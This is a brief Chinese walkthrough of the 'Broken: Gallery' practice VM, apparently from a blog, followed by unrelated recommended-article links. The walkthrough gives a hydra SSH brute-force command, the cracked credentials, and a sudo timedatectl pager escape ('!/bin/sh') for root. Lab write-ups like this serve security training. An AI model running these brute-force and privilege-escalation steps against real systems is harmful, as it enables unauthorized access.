Broken: Gallery靶机

端口扫描

靶机ip地址为 192.168.153.157

目录扫描

访问80端口

点击查看,目录拼接访问,没有发现什么有用信息

尝试22端口的ssh进行爆破

hydra -L rockyou.txt -P rockyou.txt 192.168.153.157 ssh

爆破出密码 broken | broken

ssh连接

ssh broken@192.168.153.157

连接成功

提权

sudo -l

sudo timedatectl list-timezones

!/bin/sh

相关推荐
持敬chijing10 分钟前
Web渗透之前后端漏洞-CSRF(跨站请求伪造)
安全·web安全·网络安全·xss·csrf
火山上的企鹅11 分钟前
Codex实战:APP远程升级服务搭建(五)App端远程升级接入
android·服务器·远程升级·qgc
Web极客码11 分钟前
使用FeedBurner优化WordPress订阅体验
服务器·wordpress·feedburner
持敬chijing17 分钟前
Web渗透之前后端漏洞-文件下载漏洞
sql·web安全·网络安全·网络攻击模型·web
Lang-121018 分钟前
CentOS Linux服务器完整迁移方案
linux·服务器·centos
TCW112121 分钟前
Linux操作系统系列.动态加载
linux·服务器
七夜zippoe26 分钟前
DolphinDB Modbus协议接入:PLC数据采集
网络·数据采集·plc·modbus·dolphindb
lisanmengmeng28 分钟前
gitlab 免密配置
linux·服务器·gitlab
普马萨特31 分钟前
Wi-Fi (802.11) 协议演进
运维·服务器·网络
与代码不die不休32 分钟前
RTX5060显卡torch和torch_radon库安装避坑指南(仅linux系统)
linux·图像处理·python·深度学习